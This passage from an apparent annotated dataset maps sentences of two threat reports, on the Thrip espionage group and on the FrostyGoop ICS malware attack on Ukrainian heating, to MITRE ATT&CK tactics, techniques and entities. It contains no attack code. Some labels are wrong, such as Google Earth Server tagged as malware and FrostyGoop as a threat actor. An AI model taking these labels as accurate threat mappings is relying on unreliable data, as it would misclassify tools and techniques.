processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s15-47183e", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land.", "sentence_text": "TAA not only flagged this malicious use of PsExec, it also told us what the attackers were using it for.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s16-5cdcca", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "TAA not only flagged this malicious use of PsExec, it also told us what the attackers were using it for.", "sentence_text": "They were attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim’s network.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.002", "name": "SMB/Windows Admin Shares" } ], "procedure": "Remote installation of Infostealer.Catchamas on victim computers.", "entities": [ { "text": "Infostealer.Catchamas", "start": 81, "end": 102, "label": "MalwareTool" } ] }, { "uid": "mitre-87_mitre_report-p1-s17-950f5b", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "They were attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim’s network.", "sentence_text": "Armed with this information about the malware and living off the land tactics being used by this group of attackers whom we named Thrip, we broadened our search to see if we could find similar patterns that indicated Thrip had been targeting other organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s18-614242", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "Armed with this information about the malware and living off the land tactics being used by this group of attackers whom we named Thrip, we broadened our search to see if we could find similar patterns that indicated Thrip had been targeting other organizations.", "sentence_text": "We uncovered a wide-ranging cyber espionage campaign involving powerful malware being used against targets that are a cause for concern.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s19-026fcd", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "We uncovered a wide-ranging cyber espionage campaign involving powerful malware being used against targets that are a cause for concern.", "sentence_text": "We identified three computers in China being used to launch the Thrip attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s20-7379c9", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "We identified three computers in China being used to launch the Thrip attacks.", "sentence_text": "Eye on the sky: Thrip’s targets Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s21-d40c0e", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "Eye on the sky: Thrip’s targets Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator.", "sentence_text": "The attack group seemed to be particularly interested in the operational side of the company, looking for and infecting computers running software that monitors and controls satellites.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1018", "name": "Remote System Discovery" } ], "procedure": "The attackers targeted and infected computers used to operate satellite-monitoring software.", "entities": [ { "text": "The attack group ", "start": 0, "end": 17, "label": "ThreatActor" }, { "text": "infecting computers", "start": 110, "end": 129, "label": "Action" } ] }, { "uid": "mitre-87_mitre_report-p1-s22-e56cfd", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "The attack group seemed to be particularly interested in the operational side of the company, looking for and infecting computers running software that monitors and controls satellites.", "sentence_text": "This suggests to us that Thrip’s motives go beyond spying and may also include disruption.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s23-6eff54", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "This suggests to us that Thrip’s motives go beyond spying and may also include disruption.", "sentence_text": "Another target was an organization involved in geospatial imaging and mapping.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s24-503b6b", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "Another target was an organization involved in geospatial imaging and mapping.", "sentence_text": "Again, Thrip seemed to be mainly interested in the operational side of the company.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s25-1a95e2", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "Again, Thrip seemed to be mainly interested in the operational side of the company.", "sentence_text": "It targeted computers running MapXtreme Geographic Information System (GIS) software which is used for tasks such as developing custom geospatial applications or integrating location-based data into other applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s26-1413f5", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "It targeted computers running MapXtreme Geographic Information System (GIS) software which is used for tasks such as developing custom geospatial applications or integrating location-based data into other applications.", "sentence_text": "It also targeted machines running Google Earth Server and Garmin imaging software.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "The attackers targeted systems that were running Google Earth Server and Garmin imaging software.", "entities": [ { "text": "Google Earth Server ", "start": 34, "end": 54, "label": "MalwareTool" }, { "text": "Garmin imaging software", "start": 58, "end": 81, "label": "MalwareTool" } ] }, { "uid": "mitre-87_mitre_report-p1-s27-f02324", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "It also targeted machines running Google Earth Server and Garmin imaging software.", "sentence_text": "The satellite operator wasn’t the only communications target Thrip was interested in.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s28-93af75", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "The satellite operator wasn’t the only communications target Thrip was interested in.", "sentence_text": "The group had also targeted three different telecoms operators, all based in Southeast Asia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s29-2a34f3", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "The group had also targeted three different telecoms operators, all based in Southeast Asia.", "sentence_text": "Attempting to hide in plain sight Thrip uses a mixture of custom malware and living off the land tools to perform its attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s30-bdc3a1", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "Attempting to hide in plain sight Thrip uses a mixture of custom malware and living off the land tools to perform its attacks.", "sentence_text": "The latter include:\nPsExec\n: Microsoft Sysinternals tool for executing processes on other systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s31-e220d6", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "The latter include:\nPsExec\n: Microsoft Sysinternals tool for executing processes on other systems.", "sentence_text": "The tool was primarily used by the attackers to move laterally on the victim’s network.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Use a remote execution tool to move laterally across systems within the victim network.", "entities": [ { "text": "used by the attackers to move laterally on the victim’s network", "start": 23, "end": 86, "label": "Action" }, { "text": "The tool", "start": 0, "end": 8, "label": "MalwareTool" } ] }, { "uid": "mitre-87_mitre_report-p1-s32-615eef", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "The tool was primarily used by the attackers to move laterally on the victim’s network.", "sentence_text": "WinSCP:\nOpen source FTP client used to exfiltrate data from targeted organizations.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1048", "name": "Exfiltration Over Alternative Protocol" } ], "procedure": "The tool WinSCP was used to exfiltrate data via FTP.", "entities": [ { "text": "WinSCP", "start": 0, "end": 6, "label": "MalwareTool" } ] }, { "uid": "mitre-87_mitre_report-p1-s33-d4147f", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "WinSCP:\nOpen source FTP client used to exfiltrate data from targeted organizations.", "sentence_text": "LogMeIn:\nCloud-based remote access software.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s34-602fb6", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "LogMeIn:\nCloud-based remote access software.", "sentence_text": "It’s unclear whether the attackers gained unauthorized access to the victim’s LogMeIn accounts or whether they created their own.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s35-613b0d", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "It’s unclear whether the attackers gained unauthorized access to the victim’s LogMeIn accounts or whether they created their own.", "sentence_text": "For example, PowerShell is widely used within enterprises and the vast majority of scripts are legitimate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s36-5f3d31", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "For example, PowerShell is widely used within enterprises and the vast majority of scripts are legitimate.", "sentence_text": "Similarly, PsExec is frequently used by systems administrators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s37-77292c", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "Similarly, PsExec is frequently used by systems administrators.", "sentence_text": "Through advanced artificial intelligence and machine learning, TAA has trained itself to spot patterns of malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s38-70a329", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "Through advanced artificial intelligence and machine learning, TAA has trained itself to spot patterns of malicious activity.", "sentence_text": "While PsExec itself may be innocuous, the way that it was being used here triggered an alert by TAA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s39-6add6e", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "While PsExec itself may be innocuous, the way that it was being used here triggered an alert by TAA.", "sentence_text": "In short, Thrip’s attempts at camouflage blew its cover.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s40-cb1357", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "In short, Thrip’s attempts at camouflage blew its cover.", "sentence_text": "While Thrip now makes heavy use of living off the land tactics, it also employs custom malware ( Infostealer.Catchamas ), particularly against computers of interest.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "The threat actor uses custom malware alongside living-off-the-land techniques.", "entities": [ { "text": "Infostealer.Catchamas ", "start": 97, "end": 119, "label": "MalwareTool" }, { "text": "Thrip ", "start": 6, "end": 12, "label": "ThreatActor" } ] }, { "uid": "mitre-87_mitre_report-p1-s41-164d0f", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "While Thrip now makes heavy use of living off the land tactics, it also employs custom malware ( Infostealer.Catchamas ), particularly against computers of interest.", "sentence_text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s42-3e954c", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection.", "sentence_text": "Highly targeted espionage operation From the initial alert triggered by TAA, we were able to follow a trail that eventually enabled us to see the bigger picture of a cyber espionage campaign originating from computers within China and targeting multiple organizations in the U.S. and Southeast Asia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s43-942472", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "Highly targeted espionage operation From the initial alert triggered by TAA, we were able to follow a trail that eventually enabled us to see the bigger picture of a cyber espionage campaign originating from computers within China and targeting multiple organizations in the U.S. and Southeast Asia.", "sentence_text": "Protection\nThe following protections are in place to protect customers against Thrip attacks:\nFile-based protection\nInfostealer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s44-a2dc3a", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "Protection\nThe following protections are in place to protect customers against Thrip attacks:\nFile-based protection\nInfostealer.", "sentence_text": "Catchamas\nHacktool.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s45-d5d2ea", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "Catchamas\nHacktool.", "sentence_text": "Further reading\nTo find out more about Targeted Attack Analytics (TAA), read our whitepaper Targeted Attack Analytics: Using Cloud-based Artificial Intelligence for Enterprise-Focused Advanced Threat Protection Related Blog Posts 6 Nov 2025 Min Read China-linked Actors Maintain Focus on Organizations Influencing U.S. Policy 29 Oct 2025 Min Read Ukrainian organizations still heavily targeted by Russian attacks 22 Oct 2025 Min Read Warlock Ransomware:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s46-b95f83", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "Further reading\nTo find out more about Targeted Attack Analytics (TAA), read our whitepaper Targeted Attack Analytics: Using Cloud-based Artificial Intelligence for Enterprise-Focused Advanced Threat Protection Related Blog Posts 6 Nov 2025 Min Read China-linked Actors Maintain Focus on Organizations Influencing U.S. Policy 29 Oct 2025 Min Read Ukrainian organizations still heavily targeted by Russian attacks 22 Oct 2025 Min Read Warlock Ransomware:", "sentence_text": "Old Actor, New Tricks?\n22 Oct 2025 Min Read ToolShell Used to Compromise Telecoms Company in Middle East Explore Upcoming Events Find experts in the wild See what's next", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p1-s1-175658", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "I N T E L L I G E N C E B R I E F Impact of FrostyGoop ICS Malware on Connected OT Systems MARK (MAGPIE) GRAHAM | INTEL CAPABILITY TECHNICAL DIRECTOR CAROLYN AHLERS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p2-s2-ea0c5c", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 2, "sentence_id": 2, "context_before": "I N T E L L I G E N C E B R I E F Impact of FrostyGoop ICS Malware on Connected OT Systems MARK (MAGPIE) GRAHAM | INTEL CAPABILITY TECHNICAL DIRECTOR CAROLYN AHLERS", "sentence_text": "Summary 01\nKey Findings 01", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p2-s3-603bf8", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 2, "sentence_id": 3, "context_before": "Summary 01\nKey Findings 01", "sentence_text": "Analyzing the FrostyGoop ICS Malware 02", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p2-s4-bf6e81", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 2, "sentence_id": 4, "context_before": "Analyzing the FrostyGoop ICS Malware 02", "sentence_text": "What Is the Modbus Protocol?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p2-s5-45cb83", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 2, "sentence_id": 5, "context_before": "What Is the Modbus Protocol?", "sentence_text": "FrostyGoop ICS Malware CapabilitiesCONTENTS Optional Command Line Execution Arguments Configuration File Modbus TCP Network TrafficOF Logging Capabilities 2024 OT Cyber Attack Impacting Communities in Ukraine 06", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p2-s6-b3c88b", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 2, "sentence_id": 6, "context_before": "FrostyGoop ICS Malware CapabilitiesCONTENTS Optional Command Line Execution Arguments Configuration File Modbus TCP Network TrafficOF Logging Capabilities 2024 OT Cyber Attack Impacting Communities in Ukraine 06", "sentence_text": "Assessing the Broader Impact on OT Cybersecurity 07TABLE Guidance for Dragos Customers 07 Recommendations – Implement 5 Critical Controls 09 Conclusion 10", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s7-58b25e", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 7, "context_before": "Assessing the Broader Impact on OT Cybersecurity 07TABLE Guidance for Dragos Customers 07 Recommendations – Implement 5 Critical Controls 09 Conclusion 10", "sentence_text": "Summary\nFrostyGoop is the ninth industrial control systems (ICS) specific malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s8-c0ecec", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 8, "context_before": "Summary\nFrostyGoop is the ninth industrial control systems (ICS) specific malware.", "sentence_text": "It is the first ICS-specific malware that uses Modbus TCP communications to achieve an impact on Operational Technology (OT).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s9-3dd876", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 9, "context_before": "It is the first ICS-specific malware that uses Modbus TCP communications to achieve an impact on Operational Technology (OT).", "sentence_text": "Dragos discovered FrostyGoop in April 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s10-ee0b64", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 10, "context_before": "Dragos discovered FrostyGoop in April 2024.", "sentence_text": "It can interact directly with ICS using Modbus TCP, a standard ICS protocol across all industrial sectors and organizations worldwide.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s11-5c777a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 11, "context_before": "It can interact directly with ICS using Modbus TCP, a standard ICS protocol across all industrial sectors and organizations worldwide.", "sentence_text": "Dragos assesses that FrostyGoop was used in this attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s12-4b8a57", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 12, "context_before": "Dragos assesses that FrostyGoop was used in this attack.", "sentence_text": "An associated FrostyGoop configuration file contained the IP address of an ENCO control device, leading Dragos to assess with moderate confidence that FrostyGoop was used to target ENCO controllers with TCP port 502 open to the internet.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "targeted internet-facing ENCO controllers via port 502", "entities": [ { "text": "FrostyGoop", "start": 14, "end": 24, "label": "ThreatActor" } ] }, { "uid": "mitre-88_mitre_report-p3-s13-e3aeb6", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 13, "context_before": "An associated FrostyGoop configuration file contained the IP address of an ENCO control device, leading Dragos to assess with moderate confidence that FrostyGoop was used to target ENCO controllers with TCP port 502 open to the internet.", "sentence_text": "Given the widespread use of Modbus devices globally, the broad applicability of this threat underscores the urgent need for ICS network visibility and monitoring of Modbus TCP traffic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s14-900e2f", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 14, "context_before": "Given the widespread use of Modbus devices globally, the broad applicability of this threat underscores the urgent need for ICS network visibility and monitoring of Modbus TCP traffic.", "sentence_text": "Detecting and flagging deviations from normal behavior and identifying attack patterns and behaviors that exploit the Modbus TCP protocol is crucial.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s15-e711e6", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 15, "context_before": "Detecting and flagging deviations from normal behavior and identifying attack patterns and behaviors that exploit the Modbus TCP protocol is crucial.", "sentence_text": "Key Findings\n• FrostyGoop is the ninth industrial control system (ICS) specific malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s16-5b086f", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 16, "context_before": "Key Findings\n• FrostyGoop is the ninth industrial control system (ICS) specific malware.", "sentence_text": "It is the first ICS-specific malware that uses Modbus TCP communications to achieve an impact on operational technology (OT).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s17-14c254", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 17, "context_before": "It is the first ICS-specific malware that uses Modbus TCP communications to achieve an impact on operational technology (OT).", "sentence_text": "• In April 2024, Dragos discovered multiple FrostyGoop binaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s18-9fcf0a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 18, "context_before": "• In April 2024, Dragos discovered multiple FrostyGoop binaries.", "sentence_text": "FrostyGoop is ICS-specific malware written in Golang that directly interacts with industrial control systems (ICS) using Modbus TCP over port 502.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s19-371ade", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 19, "context_before": "FrostyGoop is ICS-specific malware written in Golang that directly interacts with industrial control systems (ICS) using Modbus TCP over port 502.", "sentence_text": "It is compiled for Windows systems, and at the time of the discovery, antivirus vendors did not detect it as malicious.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s20-fd2a5e", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 20, "context_before": "It is compiled for Windows systems, and at the time of the discovery, antivirus vendors did not detect it as malicious.", "sentence_text": "During sub-zero temperatures, the attack disrupted the power supply to heating services to over 600 apartment buildings.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1489", "name": "Service Stop" } ], "procedure": "The attack disrupted power supply to heating services affecting apartment buildings.", "entities": [ { "text": "disrupted the power supply to heating services", "start": 41, "end": 87, "label": "Action" }, { "text": "heating services", "start": 71, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "apartment buildings", "start": 100, "end": 119, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-88_mitre_report-p3-s21-2e84eb", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 21, "context_before": "During sub-zero temperatures, the attack disrupted the power supply to heating services to over 600 apartment buildings.", "sentence_text": "The adversaries sent Modbus commands to ENCO controllers, causing inaccurate measurements and system malfunctions.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0814", "name": "Modify Control Logic" } ], "procedure": "Adversaries sent Modbus commands to controllers to manipulate system behavior and cause operational malfunctions.", "entities": [ { "text": "The adversaries", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "sent Modbus commands to ENCO controllers", "start": 16, "end": 56, "label": "Action" }, { "text": "ENCO controllers", "start": 40, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "causing inaccurate measurements", "start": 58, "end": 89, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p3-s22-e9325b", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 22, "context_before": "The adversaries sent Modbus commands to ENCO controllers, causing inaccurate measurements and system malfunctions.", "sentence_text": "Remediation took almost two days.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p3-s24-1de7f1", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 24, "context_before": "•", "sentence_text": "The investigation revealed that the adversaries possibly gained access to the victim network through an undetermined vulnerability in an externally facing router.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "They entered the network by exploiting an unknown vulnerability in an externally facing router", "entities": [ { "text": " adversaries", "start": 35, "end": 47, "label": "ThreatActor" }, { "text": "gained access", "start": 57, "end": 70, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p3-s25-e25997", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 3, "sentence_id": 25, "context_before": "The investigation revealed that the adversaries possibly gained access to the victim network through an undetermined vulnerability in an externally facing router.", "sentence_text": "Page | 1 FrostyGoop Intel Brief", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s26-566c6d", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 26, "context_before": "Page | 1 FrostyGoop Intel Brief", "sentence_text": "• FrostyGoop’s ability to communicate with ICS devices via Modbus TCP threatens critical infrastructure across multiple sectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s27-fcb459", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 27, "context_before": "• FrostyGoop’s ability to communicate with ICS devices via Modbus TCP threatens critical infrastructure across multiple sectors.", "sentence_text": "Given the ubiquity of the Modbus TCP protocol in industrial environments, this malware can potentially cause disruptions across all industrial sectors by interacting with legacy and modern systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s29-96a2b8", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 29, "context_before": "•", "sentence_text": "The Ukrainian incident highlights the need for adequate security controls, including OT-native monitoring.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s30-5fbcec", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 30, "context_before": "The Ukrainian incident highlights the need for adequate security controls, including OT-native monitoring.", "sentence_text": "Antivirus vendors’ lack of detection underscores the urgency of implementing continuous OT network security monitoring with ICS protocol-aware analytics to inform operations of potential risks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s32-12c0e5", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 32, "context_before": "•", "sentence_text": "Dragos recommends that organizations implement the SANS 5 Critical Controls for World-Class OT Cybersecurity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s33-47aa22", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 33, "context_before": "Dragos recommends that organizations implement the SANS 5 Critical Controls for World-Class OT Cybersecurity.", "sentence_text": "Analyzing the FrostyGoop ICS Malware In April 2024, Dragos discovered multiple FrostyGoop binaries during routine triage of suspicious files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s34-838a2c", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 34, "context_before": "Analyzing the FrostyGoop ICS Malware In April 2024, Dragos discovered multiple FrostyGoop binaries during routine triage of suspicious files.", "sentence_text": "FrostyGoop is an ICS-specific malware written in Golang that can interact directly with industrial control systems (ICS) using Modbus TCP over port 502.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s35-c31334", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 35, "context_before": "FrostyGoop is an ICS-specific malware written in Golang that can interact directly with industrial control systems (ICS) using Modbus TCP over port 502.", "sentence_text": "According to VirusTotal, antivirus vendors do not detect the FrostyGoop files as malicious.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s36-080c43", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 36, "context_before": "According to VirusTotal, antivirus vendors do not detect the FrostyGoop files as malicious.", "sentence_text": "FrostyGoop binaries are compiled for Windows systems.", "relevant": "no", "tactic": null, 